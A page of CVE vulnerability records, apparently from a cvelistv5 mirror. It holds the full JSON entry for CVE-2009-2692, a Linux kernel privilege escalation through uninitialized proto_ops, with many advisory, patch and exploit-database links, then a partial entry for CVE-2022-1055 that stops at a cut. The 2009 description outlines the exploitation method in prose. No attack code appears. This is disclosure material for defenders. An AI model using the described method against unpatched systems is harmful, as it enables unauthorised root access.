http://www.exploit-db.com/exploits/19933exploit, x_refsource_EXPLOIT-DB
http://www.vupen.com/english/advisories/2009/2272vdb-entry, x_refsource_VUPEN
http://lists.opensuse.org/opensuse-security-announce/2009-09/msg00001.htmlvendor-advisory, x_refsource_SUSE
http://www.securityfocus.com/archive/1/505751/100/0/threadedmailing-list, x_refsource_BUGTRAQ
http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git%3Ba=commit%3Bh=e694958388c50148389b0e9b9e9e8945cf0f1b98x_refsource_CONFIRM
http://secunia.com/advisories/36289third-party-advisory, x_refsource_SECUNIA
http://www.securityfocus.com/archive/1/507985/100/0/threadedmailing-list, x_refsource_BUGTRAQ
http://secunia.com/advisories/36327third-party-advisory, x_refsource_SECUNIA
http://support.avaya.com/css/P8/documents/100067254x_refsource_CONFIRM
http://grsecurity.net/~spender/wunderbar_emporium.tgzx_refsource_MISC
https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A11591vdb-entry, signature, x_refsource_OVAL
http://git.kernel.org/?p=linux/kernel/git/stable/linux-2.4.37.y.git%3Ba=commit%3Bh=c18d0fe535a73b219f960d1af3d0c264555a12e3x_refsource_CONFIRM
https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A11526vdb-entry, signature, x_refsource_OVAL
http://www.mandriva.com/security/advisories?name=MDVSA-2009:233vendor-advisory, x_refsource_MANDRIVA
http://www.exploit-db.com/exploits/9477exploit, x_refsource_EXPLOIT-DB
http://blog.cr0.org/2009/08/linux-null-pointer-dereference-due-to.htmlx_refsource_MISC
http://www.kernel.org/pub/linux/kernel/v2.6/testing/ChangeLog-2.6.31-rc6x_refsource_CONFIRM
https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A8657vdb-entry, signature, x_refsource_OVAL
http://www.openwall.com/lists/oss-security/2009/08/14/1mailing-list, x_refsource_MLIST
http://www.securityfocus.com/bid/36038vdb-entry, x_refsource_BID
http://www.securityfocus.com/archive/1/505912/100/0/threadedmailing-list, x_refsource_BUGTRAQ
http://zenthought.org/content/file/android-root-2009-08-16-sourcex_refsource_MISC
http://www.vupen.com/english/advisories/2009/3316vdb-entry, x_refsource_VUPEN
http://www.kernel.org/pub/linux/kernel/v2.6/ChangeLog-2.6.30.5x_refsource_CONFIRM
Impacted products
VendorProduct
n/an/a
Show details on NVD website


{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-07T05:59:57.073Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "name": "RHSA-2009:1233",
            "tags": [
              "vendor-advisory",
              "x_refsource_REDHAT",
              "x_transferred"
            ],
            "url": "http://www.redhat.com/support/errata/RHSA-2009-1233.html"
          },
          {
            "name": "36278",
            "tags": [
              "third-party-advisory",
              "x_refsource_SECUNIA",
              "x_transferred"
            ],
            "url": "http://secunia.com/advisories/36278"
          },
          {
            "name": "DSA-1865",
            "tags": [
              "vendor-advisory",
              "x_refsource_DEBIAN",
              "x_transferred"
            ],
            "url": "http://www.debian.org/security/2009/dsa-1865"
          },
          {
            "name": "RHSA-2009:1223",
            "tags": [
              "vendor-advisory",
              "x_refsource_REDHAT",
              "x_transferred"
            ],
            "url": "http://rhn.redhat.com/errata/RHSA-2009-1223.html"
          },
          {
            "name": "20100625 VMSA-2010-0010 ESX 3.5 third party update for Service Console kernel",
            "tags": [
              "mailing-list",
              "x_refsource_BUGTRAQ",
              "x_transferred"
            ],
            "url": "http://www.securityfocus.com/archive/1/512019/100/0/threaded"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "http://www.kernel.org/pub/linux/kernel/v2.4/ChangeLog-2.4.37.5"
          },
          {
            "name": "37298",
            "tags": [
              "third-party-advisory",
              "x_refsource_SECUNIA",
              "x_transferred"
            ],
            "url": "http://secunia.com/advisories/37298"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "http://wiki.rpath.com/wiki/Advisories:rPSA-2009-0121"
          },
          {
            "name": "36430",
            "tags": [
              "third-party-advisory",
              "x_refsource_SECUNIA",
              "x_transferred"
            ],
            "url": "http://secunia.com/advisories/36430"
          },
          {
            "name": "37471",
            "tags": [
              "third-party-advisory",
              "x_refsource_SECUNIA",
              "x_transferred"
            ],
            "url": "http://secunia.com/advisories/37471"
          },
          {
            "name": "RHSA-2009:1222",
            "tags": [
              "vendor-advisory",
              "x_refsource_REDHAT",
              "x_transferred"
            ],
            "url": "http://rhn.redhat.com/errata/RHSA-2009-1222.html"
          },
          {
            "name": "20090813 Linux NULL pointer dereference due to incorrect proto_ops initializations",
            "tags": [
              "mailing-list",
              "x_refsource_FULLDISC",
              "x_transferred"
            ],
            "url": "http://archives.neohapsis.com/archives/fulldisclosure/2009-08/0174.html"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://bugzilla.redhat.com/show_bug.cgi?id=516949"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://issues.rpath.com/browse/RPL-3103"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "http://www.vmware.com/security/advisories/VMSA-2009-0016.html"
          },
          {
            "name": "19933",
            "tags": [
              "exploit",
              "x_refsource_EXPLOIT-DB",
              "x_transferred"
            ],
            "url": "http://www.exploit-db.com/exploits/19933"
          },
          {
            "name": "ADV-2009-2272",
            "tags": [
              "vdb-entry",
              "x_refsource_VUPEN",
              "x_transferred"
            ],
            "url": "http://www.vupen.com/english/advisories/2009/2272"
          },
          {
            "name": "SUSE-SR:2009:015",
            "tags": [
              "vendor-advisory",
              "x_refsource_SUSE",
              "x_transferred"
            ],
            "url": "http://lists.opensuse.org/opensuse-security-announce/2009-09/msg00001.html"
          },
          {
            "name": "20090813 Linux NULL pointer dereference due to incorrect proto_ops initializations",
            "tags": [
              "mailing-list",
              "x_refsource_BUGTRAQ",
              "x_transferred"
            ],
            "url": "http://www.securityfocus.com/archive/1/505751/100/0/threaded"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git%3Ba=commit%3Bh=e694958388c50148389b0e9b9e9e8945cf0f1b98"
          },
          {
            "name": "36289",
            "tags": [
              "third-party-advisory",
              "x_refsource_SECUNIA",
              "x_transferred"
            ],
            "url": "http://secunia.com/advisories/36289"
          },
          {
            "name": "20091120 VMSA-2009-0016 VMware vCenter and ESX update release and vMA patch release address multiple security issue in third party components",
            "tags": [
              "mailing-list",
              "x_refsource_BUGTRAQ",
              "x_transferred"
            ],
            "url": "http://www.securityfocus.com/archive/1/507985/100/0/threaded"
          },
          {
            "name": "36327",
            "tags": [
              "third-party-advisory",
              "x_refsource_SECUNIA",
              "x_transferred"
            ],
            "url": "http://secunia.com/advisories/36327"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "http://support.avaya.com/css/P8/documents/100067254"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "http://grsecurity.net/~spender/wunderbar_emporium.tgz"
          },
          {
            "name": "oval:org.mitre.oval:def:11591",
            "tags": [
              "vdb-entry",
              "signature",
              "x_refsource_OVAL",
              "x_transferred"
            ],
            "url": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A11591"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "http://git.kernel.org/?p=linux/kernel/git/stable/linux-2.4.37.y.git%3Ba=commit%3Bh=c18d0fe535a73b219f960d1af3d0c264555a12e3"
          },
          {
            "name": "oval:org.mitre.oval:def:11526",
            "tags": [
              "vdb-entry",
              "signature",
              "x_refsource_OVAL",
              "x_transferred"
            ],
            "url": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A11526"
          },
          {
            "name": "MDVSA-2009:233",
            "tags": [
              "vendor-advisory",
              "x_refsource_MANDRIVA",
              "x_transferred"
            ],
            "url": "http://www.mandriva.com/security/advisories?name=MDVSA-2009:233"
          },
          {
            "name": "9477",
            "tags": [
              "exploit",
              "x_refsource_EXPLOIT-DB",
              "x_transferred"
            ],
            "url": "http://www.exploit-db.com/exploits/9477"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "http://blog.cr0.org/2009/08/linux-null-pointer-dereference-due-to.html"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "http://www.kernel.org/pub/linux/kernel/v2.6/testing/ChangeLog-2.6.31-rc6"
          },
          {
            "name": "oval:org.mitre.oval:def:8657",
            "tags": [
              "vdb-entry",
              "signature",
              "x_refsource_OVAL",
              "x_transferred"
            ],
            "url": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A8657"
          },
          {
            "name": "[oss-security] 20090814 CVE-2009-2692 kernel: uninit op in SOCKOPS_WRAP() leads to privesc",
            "tags": [
              "mailing-list",
              "x_refsource_MLIST",
              "x_transferred"
            ],
            "url": "http://www.openwall.com/lists/oss-security/2009/08/14/1"
          },
          {
            "name": "36038",
            "tags": [
              "vdb-entry",
              "x_refsource_BID",
              "x_transferred"
            ],
            "url": "http://www.securityfocus.com/bid/36038"
          },
          {
            "name": "20090818 rPSA-2009-0121-1 kernel open-vm-tools",
            "tags": [
              "mailing-list",
              "x_refsource_BUGTRAQ",
              "x_transferred"
            ],
            "url": "http://www.securityfocus.com/archive/1/505912/100/0/threaded"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "http://zenthought.org/content/file/android-root-2009-08-16-source"
          },
          {
            "name": "ADV-2009-3316",
            "tags": [
              "vdb-entry",
              "x_refsource_VUPEN",
              "x_transferred"
            ],
            "url": "http://www.vupen.com/english/advisories/2009/3316"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "http://www.kernel.org/pub/linux/kernel/v2.6/ChangeLog-2.6.30.5"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "datePublic": "2009-08-13T00:00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "The Linux kernel 2.6.0 through 2.6.30.4, and 2.4.4 through 2.4.37.4, does not initialize all function pointers for socket operations in proto_ops structures, which allows local users to trigger a NULL pointer dereference and gain privileges by using mmap to map page zero, placing arbitrary code on this page, and then invoking an unavailable operation, as demonstrated by the sendpage operation (sock_sendpage function) on a PF_PPPOX socket."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2018-10-10T18:57:01",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "name": "RHSA-2009:1233",
          "tags": [
            "vendor-advisory",
            "x_refsource_REDHAT"
          ],
          "url": "http://www.redhat.com/support/errata/RHSA-2009-1233.html"
        },
        {
          "name": "36278",
          "tags": [
            "third-party-advisory",
            "x_refsource_SECUNIA"
          ],
          "url": "http://secunia.com/advisories/36278"
        },
        {
          "name": "DSA-1865",
          "tags": [
            "vendor-advisory",
            "x_refsource_DEBIAN"
          ],
          "url": "http://www.debian.org/security/2009/dsa-1865"
        },
        {
          "name": "RHSA-2009:1223",
          "tags": [
            "vendor-advisory",
            "x_refsource_REDHAT"
          ],
          "url": "http://rhn.redhat.com/errata/RHSA-2009-1223.html"
        },
        {
          "name": "20100625 VMSA-2010-0010 ESX 3.5 third party update for Service Console kernel",
          "tags": [
            "mailing-list",
            "x_refsource_BUGTRAQ"
          ],
          "url": "http://www.securityfocus.com/archive/1/512019/100/0/threaded"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "http://www.kernel.org/pub/linux/kernel/v2.4/ChangeLog-2.4.37.5"
        },
        {
          "name": "37298",
          "tags": [
            "third-party-advisory",
            "x_refsource_SECUNIA"
          ],
          "url": "http://secunia.com/advisories/37298"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "http://wiki.rpath.com/wiki/Advisories:rPSA-2009-0121"
        },
        {
          "name": "36430",
          "tags": [
            "third-party-advisory",
            "x_refsource_SECUNIA"
          ],
          "url": "http://secunia.com/advisories/36430"
        },
        {
          "name": "37471",
          "tags": [
            "third-party-advisory",
            "x_refsource_SECUNIA"
          ],
          "url": "http://secunia.com/advisories/37471"
        },
        {
          "name": "RHSA-2009:1222",
          "tags": [
            "vendor-advisory",
            "x_refsource_REDHAT"
          ],
          "url": "http://rhn.redhat.com/errata/RHSA-2009-1222.html"
        },
        {
          "name": "20090813 Linux NULL pointer dereference due to incorrect proto_ops initializations",
          "tags": [
            "mailing-list",
            "x_refsource_FULLDISC"
          ],
          "url": "http://archives.neohapsis.com/archives/fulldisclosure/2009-08/0174.html"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=516949"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://issues.rpath.com/browse/RPL-3103"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "http://www.vmware.com/security/advisories/VMSA-2009-0016.html"
        },
        {
          "name": "19933",
          "tags": [
            "exploit",
            "x_refsource_EXPLOIT-DB"
          ],
          "url": "http://www.exploit-db.com/exploits/19933"
        },
        {
          "name": "ADV-2009-2272",
          "tags": [
            "vdb-entry",
            "x_refsource_VUPEN"
          ],
          "url": "http://www.vupen.com/english/advisories/2009/2272"
        },
        {
          "name": "SUSE-SR:2009:015",
          "tags": [
            "vendor-advisory",
            "x_refsource_SUSE"
          ],
          "url": "http://lists.opensuse.org/opensuse-security-announce/2009-09/msg00001.html"
        },
        {
          "name": "20090813 Linux NULL pointer dereference due to incorrect proto_ops initializations",
          "tags": [
            "mailing-list",
            "x_refsource_BUGTRAQ"
          ],
          "url": "http://www.securityfocus.com/archive/1/505751/100/0/threaded"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git%3Ba=commit%3Bh=e694958388c50148389b0e9b9e9e8945cf0f1b98"
        },
        {
          "name": "36289",
          "tags": [
            "third-party-advisory",
            "x_refsource_SECUNIA"
          ],
          "url": "http://secunia.com/advisories/36289"
        },
        {
          "name": "20091120 VMSA-2009-0016 VMware vCenter and ESX update release and vMA patch release address multiple security issue in third party components",
          "tags": [
            "mailing-list",
            "x_refsource_BUGTRAQ"
          ],
          "url": "http://www.securityfocus.com/archive/1/507985/100/0/threaded"
        },
        {
          "name": "36327",
          "tags": [
            "third-party-advisory",
            "x_refsource_SECUNIA"
          ],
          "url": "http://secunia.com/advisories/36327"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "http://support.avaya.com/css/P8/documents/100067254"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "http://grsecurity.net/~spender/wunderbar_emporium.tgz"
        },
        {
          "name": "oval:org.mitre.oval:def:11591",
          "tags": [
            "vdb-entry",
            "signature",
            "x_refsource_OVAL"
          ],
          "url": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A11591"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "http://git.kernel.org/?p=linux/kernel/git/stable/linux-2.4.37.y.git%3Ba=commit%3Bh=c18d0fe535a73b219f960d1af3d0c264555a12e3"
        },
        {
          "name": "oval:org.mitre.oval:def:11526",
          "tags": [
            "vdb-entry",
            "signature",
            "x_refsource_OVAL"
          ],
          "url": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A11526"
        },
        {
          "name": "MDVSA-2009:233",
          "tags": [
            "vendor-advisory",
            "x_refsource_MANDRIVA"
          ],
          "url": "http://www.mandriva.com/security/advisories?name=MDVSA-2009:233"
        },
        {
          "name": "9477",
          "tags": [
            "exploit",
            "x_refsource_EXPLOIT-DB"
          ],
          "url": "http://www.exploit-db.com/exploits/9477"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "http://blog.cr0.org/2009/08/linux-null-pointer-dereference-due-to.html"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "http://www.kernel.org/pub/linux/kernel/v2.6/testing/ChangeLog-2.6.31-rc6"
        },
        {
          "name": "oval:org.mitre.oval:def:8657",
          "tags": [
            "vdb-entry",
            "signature",
            "x_refsource_OVAL"
          ],
          "url": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A8657"
        },
        {
          "name": "[oss-security] 20090814 CVE-2009-2692 kernel: uninit op in SOCKOPS_WRAP() leads to privesc",
          "tags": [
            "mailing-list",
            "x_refsource_MLIST"
          ],
          "url": "http://www.openwall.com/lists/oss-security/2009/08/14/1"
        },
        {
          "name": "36038",
          "tags": [
            "vdb-entry",
            "x_refsource_BID"
          ],
          "url": "http://www.securityfocus.com/bid/36038"
        },
        {
          "name": "20090818 rPSA-2009-0121-1 kernel open-vm-tools",
          "tags": [
            "mailing-list",
            "x_refsource_BUGTRAQ"
          ],
          "url": "http://www.securityfocus.com/archive/1/505912/100/0/threaded"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "http://zenthought.org/content/file/android-root-2009-08-16-source"
        },
        {
          "name": "ADV-2009-3316",
          "tags": [
            "vdb-entry",
            "x_refsource_VUPEN"
          ],
          "url": "http://www.vupen.com/english/advisories/2009/3316"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "http://www.kernel.org/pub/linux/kernel/v2.6/ChangeLog-2.6.30.5"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2009-2692",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "The Linux kernel 2.6.0 through 2.6.30.4, and 2.4.4 through 2.4.37.4, does not initialize all function pointers for socket operations in proto_ops structures, which allows local users to trigger a NULL pointer dereference and gain privileges by using mmap to map page zero, placing arbitrary code on this page, and then invoking an unavailable operation, as demonstrated by the sendpage operation (sock_sendpage function) on a PF_PPPOX socket."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "RHSA-2009:1233",
              "refsource": "REDHAT",
              "url": "http://www.redhat.com/support/errata/RHSA-2009-1233.html"
            },
            {
              "name": "36278",
              "refsource": "SECUNIA",
              "url": "http://secunia.com/advisories/36278"
            },
            {
              "name": "DSA-1865",
              "refsource": "DEBIAN",
              "url": "http://www.debian.org/security/2009/dsa-1865"
            },
            {
              "name": "RHSA-2009:1223",
              "refsource": "REDHAT",
              "url": "http://rhn.redhat.com/errata/RHSA-2009-1223.html"
            },
            {
              "name": "20100625 VMSA-2010-0010 ESX 3.5 third party update for Service Console kernel",
              "refsource": "BUGTRAQ",
              "url": "http://www.securityfocus.com/archive/1/512019/100/0/threaded"
            },
            {
              "name": "http://www.kernel.org/pub/linux/kernel/v2.4/ChangeLog-2.4.37.5",
              "refsource": "CONFIRM",
              "url": "http://www.kernel.org/pub/linux/kernel/v2.4/ChangeLog-2.4.37.5"
            },
            {
              "name": "37298",
              "refsource": "SECUNIA",
              "url": "http://secunia.com/advisories/37298"
            },
            {
              "name": "http://wiki.rpath.com/wiki/Advisories:rPSA-2009-0121",
              "refsource": "CONFIRM",
              "url": "http://wiki.rpath.com/wiki/Advisories:rPSA-2009-0121"
            },
            {
              "name": "36430",
              "refsource": "SECUNIA",
              "url": "http://secunia.com/advisories/36430"
            },
            {
              "name": "37471",
              "refsource": "SECUNIA",
              "url": "http://secunia.com/advisories/37471"
            },
            {
              "name": "RHSA-2009:1222",
              "refsource": "REDHAT",
              "url": "http://rhn.redhat.com/errata/RHSA-2009-1222.html"
            },
            {
              "name": "20090813 Linux NULL pointer dereference due to incorrect proto_ops initializations",
              "refsource": "FULLDISC",
              "url": "http://archives.neohapsis.com/archives/fulldisclosure/2009-08/0174.html"
            },
            {
              "name": "https://bugzilla.redhat.com/show_bug.cgi?id=516949",
              "refsource": "CONFIRM",
              "url": "https://bugzilla.redhat.com/show_bug.cgi?id=516949"
            },
            {
              "name": "https://issues.rpath.com/browse/RPL-3103",
              "refsource": "CONFIRM",
              "url": "https://issues.rpath.com/browse/RPL-3103"
            },
            {
              "name": "http://www.vmware.com/security/advisories/VMSA-2009-0016.html",
              "refsource": "CONFIRM",
              "url": "http://www.vmware.com/security/advisories/VMSA-2009-0016.html"
            },
            {
              "name": "19933",
              "refsource": "EXPLOIT-DB",
              "url": "http://www.exploit-db.com/exploits/19933"
            },
            {
              "name": "ADV-2009-2272",
              "refsource": "VUPEN",
              "url": "http://www.vupen.com/english/advisories/2009/2272"
            },
            {
              "name": "SUSE-SR:2009:015",
              "refsource": "SUSE",
              "url": "http://lists.opensuse.org/opensuse-security-announce/2009-09/msg00001.html"
            },
            {
              "name": "20090813 Linux NULL pointer dereference due to incorrect proto_ops initializations",
              "refsource": "BUGTRAQ",
              "url": "http://www.securityfocus.com/archive/1/505751/100/0/threaded"
            },
            {
              "name": "http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commit;h=e694958388c50148389b0e9b9e9e8945cf0f1b98",
              "refsource": "CONFIRM",
              "url": "http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commit;h=e694958388c50148389b0e9b9e9e8945cf0f1b98"
            },
            {
              "name": "36289",
              "refsource": "SECUNIA",
              "url": "http://secunia.com/advisories/36289"
            },
            {
              "name": "20091120 VMSA-2009-0016 VMware vCenter and ESX update release and vMA patch release address multiple security issue in third party components",
              "refsource": "BUGTRAQ",
              "url": "http://www.securityfocus.com/archive/1/507985/100/0/threaded"
            },
            {
              "name": "36327",
              "refsource": "SECUNIA",
              "url": "http://secunia.com/advisories/36327"
            },
            {
              "name": "http://support.avaya.com/css/P8/documents/100067254",
              "refsource": "CONFIRM",
              "url": "http://support.avaya.com/css/P8/documents/100067254"
            },
            {
              "name": "http://grsecurity.net/~spender/wunderbar_emporium.tgz",
              "refsource": "MISC",
              "url": "http://grsecurity.net/~spender/wunderbar_emporium.tgz"
            },
            {
              "name": "oval:org.mitre.oval:def:11591",
              "refsource": "OVAL",
              "url": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A11591"
            },
            {
              "name": "http://git.kernel.org/?p=linux/kernel/git/stable/linux-2.4.37.y.git;a=commit;h=c18d0fe535a73b219f960d1af3d0c264555a12e3",
              "refsource": "CONFIRM",
              "url": "http://git.kernel.org/?p=linux/kernel/git/stable/linux-2.4.37.y.git;a=commit;h=c18d0fe535a73b219f960d1af3d0c264555a12e3"
            },
            {
              "name": "oval:org.mitre.oval:def:11526",
              "refsource": "OVAL",
              "url": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A11526"
            },
            {
              "name": "MDVSA-2009:233",
              "refsource": "MANDRIVA",
              "url": "http://www.mandriva.com/security/advisories?name=MDVSA-2009:233"
            },
            {
              "name": "9477",
              "refsource": "EXPLOIT-DB",
              "url": "http://www.exploit-db.com/exploits/9477"
            },
            {
              "name": "http://blog.cr0.org/2009/08/linux-null-pointer-dereference-due-to.html",
              "refsource": "MISC",
              "url": "http://blog.cr0.org/2009/08/linux-null-pointer-dereference-due-to.html"
            },
            {
              "name": "http://www.kernel.org/pub/linux/kernel/v2.6/testing/ChangeLog-2.6.31-rc6",
              "refsource": "CONFIRM",
              "url": "http://www.kernel.org/pub/linux/kernel/v2.6/testing/ChangeLog-2.6.31-rc6"
            },
            {
              "name": "oval:org.mitre.oval:def:8657",
              "refsource": "OVAL",
              "url": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A8657"
            },
            {
              "name": "[oss-security] 20090814 CVE-2009-2692 kernel: uninit op in SOCKOPS_WRAP() leads to privesc",
              "refsource": "MLIST",
              "url": "http://www.openwall.com/lists/oss-security/2009/08/14/1"
            },
            {
              "name": "36038",
              "refsource": "BID",
              "url": "http://www.securityfocus.com/bid/36038"
            },
            {
              "name": "20090818 rPSA-2009-0121-1 kernel open-vm-tools",
              "refsource": "BUGTRAQ",
              "url": "http://www.securityfocus.com/archive/1/505912/100/0/threaded"
            },
            {
              "name": "http://zenthought.org/content/file/android-root-2009-08-16-source",
              "refsource": "MISC",
              "url": "http://zenthought.org/content/file/android-root-2009-08-16-source"
            },
            {
              "name": "ADV-2009-3316",
              "refsource": "VUPEN",
              "url": "http://www.vupen.com/english/advisories/2009/3316"
            },
            {
              "name": "http://www.kernel.org/pub/linux/kernel/v2.6/ChangeLog-2.6.30.5",
              "refsource": "CONFIRM",
              "url": "http://www.kernel.org/pub/linux/kernel/v2.6/ChangeLog-2.6.30.5"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2009-2692",
    "datePublished": "2009-08-14T15:00:00",
    "dateReserved": "2009-08-05T00:00:00",
    "dateUpdated": "2024-08-07T05:59:57.073Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2022-1055
Vulnerability from cvelistv5
Published
2022-03-29 15:05
Modified
2024-08-02 23:47
Summary
Use after Free in tc_new_tfilter allowing for privilege escalation in Linux Kernel
Impacted products
VendorProduct
LinuxKernel
Show details on NVD website


{
  "containers": {
    "adp": [
      {
        "affected": [
          {
            "cpes": [
              "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unaffected",
            "product": "linux_kernel",
            "vendor": "linux",
            "versions": [
              {
                "lessThan": "5.17_rc3",
                "status": "affected",
                "version": "0",
                "versionType": "custom"
              }
            ]
          }
        ],
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2022-1055",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "total"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-05-21T17:47:41.220831Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-07-24T16:10:14.757Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T23:47:43.302Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=04c2a47ffb13c29778e2a14e414ad4cb5a5db4b5"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://syzkaller.appspot.com/bug?id=2212474c958978ab86525fe6832ac8102c309ffc"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://kernel.dance/#04c2a47ffb13c29778e2a14e414ad4cb5a5db4b5"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://security.netapp.com/advisory/ntap-20220506-0007/"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "http://packetstormsecurity.com/files/167386/Kernel-Live-Patch-Security-Notice-LSN-0086-1.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Kernel",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "v5.17-rc3",
              "status": "affected",
              "version": "0",
              "versionType": "custom"
            },
            {
              "status": "unaffected",
              "version": "04c2a47ffb13c29778e2a14e414ad4cb5a5db4b5",
              "versionType": "git"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "supportingMedia": [
            {
              "base64": false,
              "type": "text/html",
              "value": "\u003cp\u003eA use-after-free exists in the Linux Kernel in tc_new_tfilter that could allow a local attacker to gain privilege escalation. The exploit requires unprivileged user namespaces. We recommend upgrading past commit 04c2a47ffb13c29778e2a14e414ad4cb5a5db4b5\u003c/p\u003e"
            }
          ],
          "value": "A use-after-free exists in the Linux Kernel in tc_new_tfilter that could allow a local attacker to gain privilege escalation. The exploit requires unprivileged user namespaces. We recommend upgrading past commit 04c2a47ffb13c29778e2a14e414ad4cb5a5db4b5"
        }
      ],
      "metrics": [
        {
          "cvssV4_0": {
            "Automatable": "NOT_DEFINED",
